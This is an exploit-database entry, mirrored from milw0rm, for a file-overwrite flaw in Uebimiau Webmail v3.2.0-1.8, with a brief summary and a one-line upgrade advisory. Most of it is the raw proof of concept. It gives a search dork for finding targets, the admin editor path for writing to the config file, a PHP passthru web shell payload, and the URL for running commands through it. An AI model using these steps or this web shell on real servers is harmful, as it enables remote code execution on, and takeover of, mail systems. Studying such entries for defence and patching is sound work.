Uebimiau Webmail - exploit.company

vendor:

Webmail

by:

milw0rm.com

7,5

CVSS

HIGH

Remote File / Overwrite Vulnerabilities

CWE

Product Name: Webmail

Affected Version From: v3.2.0-1.8

Affected Version To: v3.2.0-1.8

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Uebimiau Webmail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities

Uebimiau Webmail v3.2.0-1.8 is vulnerable to a remote file/overwrite vulnerability. An attacker can exploit this vulnerability by accessing the /uebimiau/admin/editor.php?load=config page and writing malicious code such as <?php passthru($_GET[cmd]); ?> and clicking the 'Write To File' button. The attacker can then access the /uebimiau/index.php?cmd=id page to execute the malicious code.

Mitigation:

Users should upgrade to the latest version of Uebimiau Webmail to mitigate this vulnerability.

Source

Exploit-DB raw data:

Uebimiau Webmail <= v3.2.0-1.8 Remote File / Overwrite Vulnerabilities
Dork : Uebimiau Webmail v3.2.0-1.8
POC :
     /uebimiau/admin/editor.php?load=config
And You Can Write Any Code As 
<?php passthru($_GET[cmd]); ?> After That Click {Write To File}
Go 
     /uebimiau/index.php?cmd=id
See Pic :http://www.almlf.com/get-6-2009-almlf_com_akszizl2.png
                               Thanx To 
         .___________..______     ____    ____  ___       _______ 
         |           ||   _  \    \   \  /   / /   \     /  _____|
         `---|  |----`|  |_)  |    \   \/   / /  ^  \   |  |  __  
             |  |     |      /      \_    _/ /  /_\  \  |  | |_ | 
             |  |     |  |\  \----.   |  |  /  _____  \ |  |__| | 
             |__|     | _| `._____|   |__| /__/     \__\ \______| 
                                                         
     ___       ______     ___       _______   _______ .___  ___. ____    ____ 
    /   \     /      |   /   \     |       \ |   ____||   \/   | \   \  /   / 
   /  ^  \   |  ,----'  /  ^  \    |  .--.  ||  |__   |  \  /  |  \   \/   /  
  /  /_\  \  |  |      /  /_\  \   |  |  |  ||   __|  |  |\/|  |   \_    _/   
 /  _____  \ |  `----./  _____  \  |  '--'  ||  |____ |  |  |  |     |  |     
/__/     \__\ \______/__/     \__\ |_______/ |_______||__|  |__|     |__|     

# milw0rm.com [2009-06-12]